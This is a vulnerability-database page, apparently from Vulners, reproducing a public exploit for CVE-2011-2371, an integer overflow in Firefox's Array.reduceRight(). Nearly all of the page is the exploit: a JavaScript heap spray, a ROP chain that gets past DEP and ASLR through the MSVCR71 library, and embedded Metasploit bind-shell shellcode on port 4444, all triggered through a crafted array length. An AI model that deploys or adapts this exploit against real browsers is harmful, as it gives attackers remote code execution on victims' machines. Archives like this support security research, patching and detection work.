Vulners
Lucene search
Mozilla Firefox Array.reduceRight() Integer Overflow Exploit
| Reporter | Title | Published | Views | Family All 157 |
|---|---|---|---|---|
 | Mozilla Firefox Array.reduceRight() Integer Overflow Exploit | 11 Oct 201100:00 | – | zdt |
| Mozilla Firefox Array.reduceRight() Integer Overflow | 12 Oct 201100:00 | – | zdt |
| Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit | 27 Feb 201200:00 | – | zdt |
 | Mozilla Firefox 3.6.x < 3.6.18 Multiple Vulnerabilities | 21 Jun 201100:00 | – | nessus |
| Mozilla Firefox > 4.0 and < 5.0 Multiple Vulnerabilities | 21 Jun 201100:00 | – | nessus |
| Mozilla Thunderbird 3.1.x < 3.1.11 Multiple Vulnerabilities | 21 Jun 201100:00 | – | nessus |
| Mozilla Firefox > 4.0 and < 5.0 Multiple Vulnerabilities | 21 Jun 201100:00 | – | nessus |
| Mozilla Firefox 3.6.x < 3.6.18 Multiple Vulnerabilities | 21 Jun 201100:00 | – | nessus |
| Mozilla Thunderbird 3.1.x < 3.1.11 Multiple Vulnerabilities | 21 Jun 201100:00 | – | nessus |
| CentOS 4 / 5 : firefox (CESA-2011:0885) | 23 Jun 201100:00 | – | nessus |
10
# Title: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit
# Date: 12 Oct 2011
# Author: Matteo Memelli ryujin -AT- offensive-security.com
# CVE-2011-2371
# Full exploit package: http://www.exploit-db.com/sploits/17974.zip
<html>
<head>
<title>ff-i-<3-u</title>
</head>
<body>
<center>
<br />
Title: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit<br />
Date: 12 Oct 2011<br />
Author: Matteo Memelli ryujin -AT- offensive-security.com<br />
CVE-2011-2371<br />
Full exploit package: <br />
http://www.exploit-db.com/sploits/17974.zip <br />
<br />
Thx to dookie for helping ;)<br/>
Vulnerability discovered by Chris Rohlf and Yan Ivnitskiy of Matasano Security<br />
http://www.mozilla.org/security/announce/2011/mfsa2011-22.html<br/>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2371<br/>
DEP / ASLR bypassing through JAVA MSVCR71 sayonara rop chain<br/>
Tested on Windows 7 Ultimate / firefox 3.6.16 and 3.6.17<br/><br/>
<APPLET id="MyApplet" code="ph33r.class" width=150 height=50>
You need a Java-enabled browser to pwn this.
</APPLET>
</center>
<script type="text/javascript">
var applet = document.getElementById('MyApplet');
function spray() {
// fake object pointers
var ptrs = unescape("%u4141" + // padding
// MOV EDX,DWORD[ESI] 0c000048=0c00007c
"%u0048%u0c00" +
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141" + // padding
// PIVOT MSVCR71.dll 0x7C370EEF LEA ESP,[ESI-3]
// RETN 1C75
"%u0EEF%u7C37" +
"%u4141%u4141" + // padding
"%u4141" + // padding
"%u240c%u3410" + // 3410240c RETN after PIVOT
"%u007c%u0c00" + // 0c00007c PTR TO END OF BUFFER
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u002e%u0c00"); // 0c00007c -> 0c00002e
// CALL PIVOT 0x7C370EEF
var bheader = 0x12/2; // u.n.d.e.f.i.n.e.d. string
// beginning of each array element
var nullt = 0x2/2; // string null terminator
// 0:000> ? 0c001cbe - 0c000012
// Evaluate expression: 7340 = 00001cac
var espoffset = (7340 /2) - ptrs.length;
var esppadding = unescape("%u0c0c%u0c0c");
while(esppadding.length < espoffset) {esppadding += esppadding;}
esppadding = esppadding.substring(0, espoffset);
// sayonara rop chain
rop = unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret;
rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2}
rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect
rop += unescape("%u5645%u7c36"); // pop esi;ret;
rop += unescape("%u5243%u7c34"); // ret;
rop += unescape("%u8f46%u7c34"); // pop ebp;ret;
rop += unescape("%u87ec%u7c34"); // call eax;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ufdff%uffff"); // {size}
rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size}
rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx}
rop += unescape("%u39fa%u7c34"); // pop edx;ret;
rop += unescape("%uffc0%uffff"); // {flag}
rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag}
rop += unescape("%u4648%u7c35"); // pop edi;ret;
rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment}
rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret;
rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret;
rop += unescape("%u683f%u7c36"); // push esp;ret;
rop += unescape("%ubc90%u0c0c%u0c0c"); // NOP / MOV ESP,0x0c0c0c0c
// windows/shell_bind_tcp - 341 bytes
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=, EXITFUNC=process,
// InitialAutoRunScript=, AutoRunScript=
var shell = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
"%u006a%uff53%u41d5");
rop += shell;
var tr_padding = unescape("%u0c0c%u0c0c");
while(tr_padding.length < 0x80000) {tr_padding += tr_padding;}
var dummy = ptrs + esppadding + rop + tr_padding;
var hspray = dummy.substring(0,0x80000 - bheader - nullt);
// Allocation of 64 blocks of 1Mb.
HeapBlocks = new Array()
for (i=0;i<0x40;i++){
HeapBlocks[i] += hspray;
}
}
spray();
hola = new Array;
hola.length = 2197815302; // 0x0c000014 beginning of sprayed block
w00t = function ph33r(prev, myobj, indx, array) {
alert(myobj[0]); // trigger getProperty
}
hola.reduceRight(w00t,1,2,3);
</script>
</body>
</html>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Oct 2011 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.86212